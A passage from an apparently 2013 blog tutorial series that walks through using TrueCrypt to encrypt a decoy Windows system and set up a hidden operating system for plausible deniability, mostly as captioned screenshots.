<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9OysosNz339GBNceoFNJOYDKSkGZa60xdDhCdMYs_L-ImailazvlnH56pEpK3XNjJYW0qK__gSkzpoVtSWoHnR38QRSPOIcvBKy2Ybpe5uaZwnRxxlUD0-FHjG-dYygAT0yuVPUPEyMs/s1600/042.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9OysosNz339GBNceoFNJOYDKSkGZa60xdDhCdMYs_L-ImailazvlnH56pEpK3XNjJYW0qK__gSkzpoVtSWoHnR38QRSPOIcvBKy2Ybpe5uaZwnRxxlUD0-FHjG-dYygAT0yuVPUPEyMs/s400/042.jpg" width="400" /></a></div>
<br />
<br />
~More
mouse fun! Great to feel like you are a part of the process, huh? :-) Move
that mouse for the greater good of your encryption strength!<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvsSUWOO8xjnzeoZ9lhEg3pCSofCnHexLvlik2ARBGQUsG-ZqvWekpH3alLmGuXK9rxFHxfK8KS_Q4bCbbXtVoov3l3O4I6SgDGO0E-v_kQWY94tPm-GIqtcBiJRxrxTeBzhsT5N05IHM/s1600/043.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvsSUWOO8xjnzeoZ9lhEg3pCSofCnHexLvlik2ARBGQUsG-ZqvWekpH3alLmGuXK9rxFHxfK8KS_Q4bCbbXtVoov3l3O4I6SgDGO0E-v_kQWY94tPm-GIqtcBiJRxrxTeBzhsT5N05IHM/s400/043.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Click Next... </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8TV7IZslhAD3v0KJ3bwvO79TYIoWQYGNk4e9JdQFY58PX0PaCMFOgdX06_kmaK_D20C4keDMVXTMxfhPnZmdvgDhHHQwEttvuQerJkyA5QI1AQEEItV2xmdWBIj2MBWqYVgmRyG4YcSE/s1600/044.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8TV7IZslhAD3v0KJ3bwvO79TYIoWQYGNk4e9JdQFY58PX0PaCMFOgdX06_kmaK_D20C4keDMVXTMxfhPnZmdvgDhHHQwEttvuQerJkyA5QI1AQEEItV2xmdWBIj2MBWqYVgmRyG4YcSE/s400/044.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Somewhere
in there it asks you for the password. Can't remember at which point.
(Oopsie.) Anyway, when it does, you need to enter <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja9MGuX1z0H0bhEd7tzdbcMSZl7T1t0st7k5o-EhPu1cT1g5Fo4TXBT12kk2UGO-91s2TzQKK86AYPSX_FoCINCF4Ti-M72pADYCS1KC83QRhLCEdx8K_XyZYJWR1t8sSzRjT5Uqg-lts/s1600/TC_boot2.png">Password A</a> for the
decoy operating system. Do you need any more sermons about secure
passphrases and whatnot? Didn't think so. ;)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTxvWWUcSAkBN9CYkKmPlQJs9GQUCHduFkiduHc3Pr9yrxXE-ihc_fdLmr_pu6eFhZkmaetZNB7c7mKNoxmXEkp_EEjC9IHzLtz23no56rNYWXwx_wYyX64Vr3jpV4Ar5V0tB-IyvHO7E/s1600/password.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTxvWWUcSAkBN9CYkKmPlQJs9GQUCHduFkiduHc3Pr9yrxXE-ihc_fdLmr_pu6eFhZkmaetZNB7c7mKNoxmXEkp_EEjC9IHzLtz23no56rNYWXwx_wYyX64Vr3jpV4Ar5V0tB-IyvHO7E/s320/password.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~It
will also ask you about creating a rescue disc. Creating a rescue disc
is pretty important, as you can see below. It might sound scary to have
it laying around, but your system will still require the password even
when using the rescue disc. It's not really a vulnerability any more
than the presence of the bootloader itself which is put on your hard
drive. Just make sure you
put it in a safe place so you don't lose it.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrDkZQTnq071_THWkI9SwBiE0QUErkHf_XAWASvFrYRCiup1wVqGFi4xiJiyxhEtTCgohzO7unX1VAxSzHVSJNxlLW7xtz9kLG4gaZaXNHDXzt6ZDTa1LBSij3bmwlvFD5d99Bm4p5ug8/s1600/045.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrDkZQTnq071_THWkI9SwBiE0QUErkHf_XAWASvFrYRCiup1wVqGFi4xiJiyxhEtTCgohzO7unX1VAxSzHVSJNxlLW7xtz9kLG4gaZaXNHDXzt6ZDTa1LBSij3bmwlvFD5d99Bm4p5ug8/s400/045.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~TrueCrypt creates an ISO and then helps you burn it to optical media as a rescue disc: </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm8l0AICce5JzS5DjvwcbL1BZmXWSYcAiZ5-Xx3XuhFex_z7NCobBwwfYPwjceDdxi2wP3vP10fRXvjCZeGs_W7joV0IDZntlU1nbXwysxrRfWlhdy3kDGseMRFnxl_5R4w8KQusZ7kfk/s1600/046.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm8l0AICce5JzS5DjvwcbL1BZmXWSYcAiZ5-Xx3XuhFex_z7NCobBwwfYPwjceDdxi2wP3vP10fRXvjCZeGs_W7joV0IDZntlU1nbXwysxrRfWlhdy3kDGseMRFnxl_5R4w8KQusZ7kfk/s400/046.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~The rescue disc is verified to make sure it was a good burn: </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1b0ZL5wFXDvw0DoOYotrnGAYjjogb1DX7HKR4X2zDsoiT98o1mFIaIQmHMF-Ry4fklxssFoohYPSOPeum6XHiWspN5DOKijQbWTtqVGl_fwZNdAK1ZZnH8GOHmGzrAHUwcEJmCs9e968/s1600/047.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1b0ZL5wFXDvw0DoOYotrnGAYjjogb1DX7HKR4X2zDsoiT98o1mFIaIQmHMF-Ry4fklxssFoohYPSOPeum6XHiWspN5DOKijQbWTtqVGl_fwZNdAK1ZZnH8GOHmGzrAHUwcEJmCs9e968/s400/047.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Now
we are going to tell TrueCrypt how we want the data wiped from
Partition 1. Wiped again, you say? Yup. The last time we wiped Partition
1 was to wipe operating system from it that was copied to the inner
volume of Partition 2. This time TrueCrypt is going to encrypt the decoy
operating system and wipe the unencrypted version of it. If it didn't,
then someone could potentially do forensics on Partition 1 and recover
the unencrypted version of the decoy operating system. This would be
especially bad for those who use their decoy system for activities which
are of a lower level of sensitivity but sensitive, nevertheless. As
stated earlier, the default of 3 passes should be quite adequate.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfGNLAb6TG7Ie_k8xgiVNX3-MnxBHtx_48z23OfyIrRCoi_kt7kw2sPal4mtkWFuZrtY9Uvp_GAzhbah8ePqh57QMyI0ff8u2ws22HPexYHe04QfO3QRWf_UF77NvjrhswqMccVR-0vrE/s1600/048.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfGNLAb6TG7Ie_k8xgiVNX3-MnxBHtx_48z23OfyIrRCoi_kt7kw2sPal4mtkWFuZrtY9Uvp_GAzhbah8ePqh57QMyI0ff8u2ws22HPexYHe04QfO3QRWf_UF77NvjrhswqMccVR-0vrE/s400/048.jpg" width="400" /></a></div>
<br />
~As stated, this will take a while once it actually starts which will happen later...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdQ3avs_RSz8ZPyBKeW3NbSNZP4Ve1P5UgUUhYdLr5jXbqMv1qwsYUY_CI0t4Ibfzm6rDMb0jlCIkSqG6pcByVsHcFqyphwKQaDuIT45YWWcOnVKcBR6kS54h8FojIL6XsEx2bV36IbJs/s1600/049.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdQ3avs_RSz8ZPyBKeW3NbSNZP4Ve1P5UgUUhYdLr5jXbqMv1qwsYUY_CI0t4Ibfzm6rDMb0jlCIkSqG6pcByVsHcFqyphwKQaDuIT45YWWcOnVKcBR6kS54h8FojIL6XsEx2bV36IbJs/s400/049.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~TrueCrypt is going to test everything before doing the final encryption and wipe. Click Test:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfeY7Cg-Y-h9KQ2rXfy2ITtcxH0AyJeyUSRTySkkK_MJbCxwWFh5u5Szge25LqjAGac0M8sapzavrnp5YKI8g1OVRc_1RajrO555lxQ62tRNU3haNrfPPr6h9HYerXuQhSE9HmoCt1gdo/s1600/050.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfeY7Cg-Y-h9KQ2rXfy2ITtcxH0AyJeyUSRTySkkK_MJbCxwWFh5u5Szge25LqjAGac0M8sapzavrnp5YKI8g1OVRc_1RajrO555lxQ62tRNU3haNrfPPr6h9HYerXuQhSE9HmoCt1gdo/s400/050.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~TrueCrypt
informs you that this is not the real thing and that actual encryption
will not take place. However, if the test fails, then Window may fail to
start. If this does occur, you can come back here and read the various
options for repair. Hopefully, you will be good though.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv7Lw_rB_k1xPKbKDFHngb5jhSAaD9QcCQiT_8Do6LY0TecUtg4Gev16g0goYsYKiiL7gySeCL2MVlTIGKe6Xg5ViJCtKPWaxlyxq93kHL5johvh8QvDxjyKPztsHU0LARhTAYmyxERn8/s1600/051.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv7Lw_rB_k1xPKbKDFHngb5jhSAaD9QcCQiT_8Do6LY0TecUtg4Gev16g0goYsYKiiL7gySeCL2MVlTIGKe6Xg5ViJCtKPWaxlyxq93kHL5johvh8QvDxjyKPztsHU0LARhTAYmyxERn8/s400/051.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~I scrolled down and took another photo:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNHnoZ8GvQYzbRkzlsdCHly0WCwm_5c5mZ_3EPUgah9J9T2rUibbpK4CpWjGWvYLemdsYd7ryCDiljFhmuyEw4OZmCR2qTEt0pF9Y1AQ5-724-9DTRt6pY7JbfcEna-iE52QXebmXptkU/s1600/052.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNHnoZ8GvQYzbRkzlsdCHly0WCwm_5c5mZ_3EPUgah9J9T2rUibbpK4CpWjGWvYLemdsYd7ryCDiljFhmuyEw4OZmCR2qTEt0pF9Y1AQ5-724-9DTRt6pY7JbfcEna-iE52QXebmXptkU/s400/052.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Time
to test, then. Click Yes and then <b>when your computer reboots it will
prompt you for <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja9MGuX1z0H0bhEd7tzdbcMSZl7T1t0st7k5o-EhPu1cT1g5Fo4TXBT12kk2UGO-91s2TzQKK86AYPSX_FoCINCF4Ti-M72pADYCS1KC83QRhLCEdx8K_XyZYJWR1t8sSzRjT5Uqg-lts/s1600/TC_boot2.png">Password A</a></b>. If you have any trouble, see the 2 previous
images.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTtygnZ9XP8_KUeSnfU34BZbpM8AttV_r6Wxs_DwVgau5B9vIW_ql4_k3rv93Hm-BkcdEfwtCA-T6GSZI9oLx1xzUKL7MlUOg3tq61PxGoGW4DwYR8Sb4Em_qnjg5DpmwdctKw5QNqfgY/s1600/053.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTtygnZ9XP8_KUeSnfU34BZbpM8AttV_r6Wxs_DwVgau5B9vIW_ql4_k3rv93Hm-BkcdEfwtCA-T6GSZI9oLx1xzUKL7MlUOg3tq61PxGoGW4DwYR8Sb4Em_qnjg5DpmwdctKw5QNqfgY/s400/053.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~After you've rebooted and typed Password A, hopefully
this is what you are now looking at. TrueCrypt warns here that in the
event of power loss or a system crash during the encryption process, data on the decoy operating
system may be gone forever. I didn't mention backups sooner
because I am assuming that you followed my advice in Part 2 and used a clean
system with a fresh Windows install. So hopefully, you don't even need backups.
If you do, read the instructions here on how to defer, backup data and then
resume. If you don't need to make backups, then click Encrypt.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCIYmScIaEuFcwZASXyn91hoEDwYv6g5bb3dFnfEuvWyL2JrSKAJFfr807qzBe1oj89jGIT1QHJlTzql_q5Pp55tKiQYsQhYdPKKcz-JZXFFKpBTBZgGt8aiQWEDK6U0JuxFkiAm_3ubQ/s1600/054.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCIYmScIaEuFcwZASXyn91hoEDwYv6g5bb3dFnfEuvWyL2JrSKAJFfr807qzBe1oj89jGIT1QHJlTzql_q5Pp55tKiQYsQhYdPKKcz-JZXFFKpBTBZgGt8aiQWEDK6U0JuxFkiAm_3ubQ/s400/054.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~The
next 3 photos provide instructions on how to troubleshoot any potential
future booting issues with the rescue disc... Press OK.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie35hMZL_fKgx2DpHJ_soi2og2n6F-6Blx8Dam0NUz8vVGTSuF5r-OTeXprYgDJ-d8i6tZmaQSNMD45AO597WKUnRz4x1qPZQQiHyuSB6dh-lr-bfw-d0EK7gLwugzPV8U-JiSThNtp4A/s1600/055.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie35hMZL_fKgx2DpHJ_soi2og2n6F-6Blx8Dam0NUz8vVGTSuF5r-OTeXprYgDJ-d8i6tZmaQSNMD45AO597WKUnRz4x1qPZQQiHyuSB6dh-lr-bfw-d0EK7gLwugzPV8U-JiSThNtp4A/s400/055.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibgiSiHD0vHsjo_52AEpxcFyDE-IJhY_pMUDLnwZ3JI_OYobiYeGghsG8fHsXDSl4J1kUE4xFZ574LPmoe_j2CorTn0dhq2itP6CjRVmXZnKrOMzNzq6ap7Llq9yQ4lr7J8_qd335fQy4/s1600/056.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibgiSiHD0vHsjo_52AEpxcFyDE-IJhY_pMUDLnwZ3JI_OYobiYeGghsG8fHsXDSl4J1kUE4xFZ574LPmoe_j2CorTn0dhq2itP6CjRVmXZnKrOMzNzq6ap7Llq9yQ4lr7J8_qd335fQy4/s400/056.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkO-040Nvc087qgSNUo6u3Dz7Mcp4LSjYY07fG8whQZ_y7x5VJeNHUk4ZXT8TeKUl143ukO4thwkwrazXPEPb716CToK1Q_doHFljnKg9gPlxdQ4CIX2_QFMMVo87ttfvaOaQtc7KEUPA/s1600/057.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkO-040Nvc087qgSNUo6u3Dz7Mcp4LSjYY07fG8whQZ_y7x5VJeNHUk4ZXT8TeKUl143ukO4thwkwrazXPEPb716CToK1Q_doHFljnKg9gPlxdQ4CIX2_QFMMVo87ttfvaOaQtc7KEUPA/s400/057.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
~TrueCrypt
is now encrypting your decoy operating system on Partition 1! <span style="color: lime;">Folks,
this is even more amazing than it may seem. It's actually quite
remarkable.</span> Think about it. What's happening here is that <b>while booted into Windows</b> (not a live environment!) TrueCrypt is encrypting the <i>currently booted</i> Windows AND <i>wiping the non-encrypted version of it</i>
all on the fly without even rebooting. WHAT? How is that even possible?
It's more magic from the TrueCrypt people!! If this doesn't make you
feel like <a href="http://www.truecrypt.org/donations/?lnk=21141" target="_blank">donating</a>, what will???!!!</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpei6LUciqO3-rRgURrQ6VuqMVAUxoIDI5b5g1iRCewP71MRxmJCg2ZDsX6KAEoP1xNlCSys2_J9B-d7Fp3H5r_IhEvSiXWsZfVh4zrkkRZUFd_irQ8Q1np1-cPWROcQAv4KhGCQt-YLc/s1600/058.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpei6LUciqO3-rRgURrQ6VuqMVAUxoIDI5b5g1iRCewP71MRxmJCg2ZDsX6KAEoP1xNlCSys2_J9B-d7Fp3H5r_IhEvSiXWsZfVh4zrkkRZUFd_irQ8Q1np1-cPWROcQAv4KhGCQt-YLc/s400/058.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~If
you want, you can setup additional non-system encrypted volumes to be
mounted at boot up, but that is outside the scope of this article. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAEnTOFYUZAbBPWF6kXX3qAe9fYYubzUBjf2GFQXNeVuWXwCMHyPTsYzJybfTT317TMP4hzPEz4LBNSWLPA0Kxi4Q1mhuoFzSwovwZtcTF-TSyqZeckCBCkTo7zO8sGedgTYmqsARd71w/s1600/059.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAEnTOFYUZAbBPWF6kXX3qAe9fYYubzUBjf2GFQXNeVuWXwCMHyPTsYzJybfTT317TMP4hzPEz4LBNSWLPA0Kxi4Q1mhuoFzSwovwZtcTF-TSyqZeckCBCkTo7zO8sGedgTYmqsARd71w/s400/059.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~You can click Do not show this again here: </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiokTyHAocrck4BvJvnvigw9_4DK0PfZyDePhkUN4pxZybBlFB82FUCwMuYY44UOFcjFC4V7EtidaoC12pmc8S_gZaqm537K_DAdwLOwrRaVFW6HWqaQPEG-ajZavzAOGPVHERkakrTAZ8/s1600/060.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiokTyHAocrck4BvJvnvigw9_4DK0PfZyDePhkUN4pxZybBlFB82FUCwMuYY44UOFcjFC4V7EtidaoC12pmc8S_gZaqm537K_DAdwLOwrRaVFW6HWqaQPEG-ajZavzAOGPVHERkakrTAZ8/s400/060.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
~But if you had clicked Show more information you would have seen this, which was shown earlier -- so not that big of a deal. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxW6RanzhZXpJOa7s7_ddiPn2xrDIFpUT6KxqV6Z6BXuURJEpZ9-E_O1GXUuEFIALOmjM8cQ2180ldgCHYQhmDpcPzQzCxAHwlV35naI3uPWMAzK9NjC3YQ3uUUgojkvmqq9knzImo-qk/s1600/061.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxW6RanzhZXpJOa7s7_ddiPn2xrDIFpUT6KxqV6Z6BXuURJEpZ9-E_O1GXUuEFIALOmjM8cQ2180ldgCHYQhmDpcPzQzCxAHwlV35naI3uPWMAzK9NjC3YQ3uUUgojkvmqq9knzImo-qk/s400/061.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Alright,
let's test this baby! If you reboot, you should get the bootloader shown
below. If you type Password A, you get the decoy operating system on
Partition 1. If you type Password B, you will get the hidden operating
system on the inner volume of Partition 2! Don't worry, if you press
Escape it doesn't really bypass authentication as long as you have
encrypted the drive (which you just did.) It would only work if you had a
TrueCrypt bootloader sitting on top of an unencrypted system, which is not the case here.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNOqGnSyVL0ZVzJZXMiOLKC6BdcSIQZ66FLWfRiizvOlEggEGFJJkYLqR7ZTsZVtdihCjJeBDLotgIGWKoK5far1Z6HNq76iItI6fXuf_a7Sbd6dZRk0RJGPJCjq2oEGTBnU6DLr7JKQE/s1600/062.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNOqGnSyVL0ZVzJZXMiOLKC6BdcSIQZ66FLWfRiizvOlEggEGFJJkYLqR7ZTsZVtdihCjJeBDLotgIGWKoK5far1Z6HNq76iItI6fXuf_a7Sbd6dZRk0RJGPJCjq2oEGTBnU6DLr7JKQE/s400/062.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~If
instead of typing the password or Escape you press F8, you will get
some options which you will hopefully never need. Most of these options
are only there because this same bootloader gets copied to the rescue
disc and would be run from there. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9n1QRdEH9vQ4FuhFTyABBkOTklMklMbZfmWFX_uFRY5EPpVGquemxOjuJfF1OLqQqG0hg45PxcS1nI02uAgIMcPBCy4vx3WZLjDqcCxyjPeXFloC14ddcGYmlsgoALeCGexZBMdzsDFY/s1600/063.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9n1QRdEH9vQ4FuhFTyABBkOTklMklMbZfmWFX_uFRY5EPpVGquemxOjuJfF1OLqQqG0hg45PxcS1nI02uAgIMcPBCy4vx3WZLjDqcCxyjPeXFloC14ddcGYmlsgoALeCGexZBMdzsDFY/s400/063.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
~Awesome!
So you've set up your system! In Part
4 I will boot into a live CD just to prove out whether or not I can
see the encrypted data and show you some cool stuff, so stay tuned!<br />
<br />
Links to each section:<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part.html">Part 1</a> - (Un)boring intro with all the snazzy info<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-2.html">Part 2</a> - Setup your second partition<br />
Part 3 - Setup your first partition (sounds backwards, I know) -- you are here<br />
Part 4 - Other cool stuff -- COMING SOONUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-7234868018489453962013-09-06T01:35:00.001-05:002013-09-12T21:01:12.273-05:00Plausible deniability of a hidden OS - Part 2This is Part 2 of a 4 part post on using TrueCrypt to create a hidden operating system.<br />
<br />
Links to each section:<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part.html" target="">Part 1</a> - (Un)boring intro with all the snazzy info<br />
Part 2 - Setup your second partition -- you are here<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-3.html">Part 3</a> - Setup your first partition (sounds backwards, I know)<br />
Part 4 - Other cool stuff -- COMING SOON<br />
<br />
<br />
<span style="font-size: large;">Part 2 - Setup your second partition</span><br />
<br />
This
section guides you through setting up the outer and inner volumes on
Partition 2. Some of the images are a little too small to read but all
you have to do is click on them to enlarge. One other note: It can
sometimes get confusing on blog posts whether the paragraph of text
applies to the image above it, or the image below it. Well, in this case the paragraphs of text always apply to the image <i>below</i>, if there is one.<br />
<br />
Throughout this processs you may want to refer back to this quick rundown of the passwords you will need to assign and their roles:<br />
<br />
-Password A: This is the password that you will use for the decoy operating system on Partition 1.<br />
-Password B: This is the password that you will use for the hidden operating system on the inner volume of Partition 2<br />
-Password C: This is the password that you will use for the outer volume on Partition 2 which will contain decoy files (not the decoy operating system)<br />
<br />
Okay, let's get started.<br />
<br />
<br />
~~ First download and install TrueCrypt for Windows <a href="http://www.truecrypt.org/downloads" target="_blank">here</a>. Note: TrueCrypt can <a href="http://www.truecrypt.org/docs/?s=sys-encryption-supported-os" target="_blank">only create an encrypted operating system boot setup for Windows</a>. Mac and Linux are supported for encrypted volumes, but <b>not</b> an encrypted operating system. However, there are other options available for other operating systems, so hit up Google.<br />
<br />
~~ Next, you need to setup your partitioning to prepare for the encryption like this:<br />
<br />
<b>First partition</b>
= Your current Windows installation which will later be moved to the
second partition and hidden (The way TrueCrypt does things here is that
as part of the wizard the current installation of Windows will be moved
to the inner volume of the second partition and hidden. It may be a good
idea to start with a fresh install of Windows.)<br />
<b>Second partition</b> = At least 2.1 times larger than the first partition<br />
<br />
Here's how I set mine up (click the image to enlarge):<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
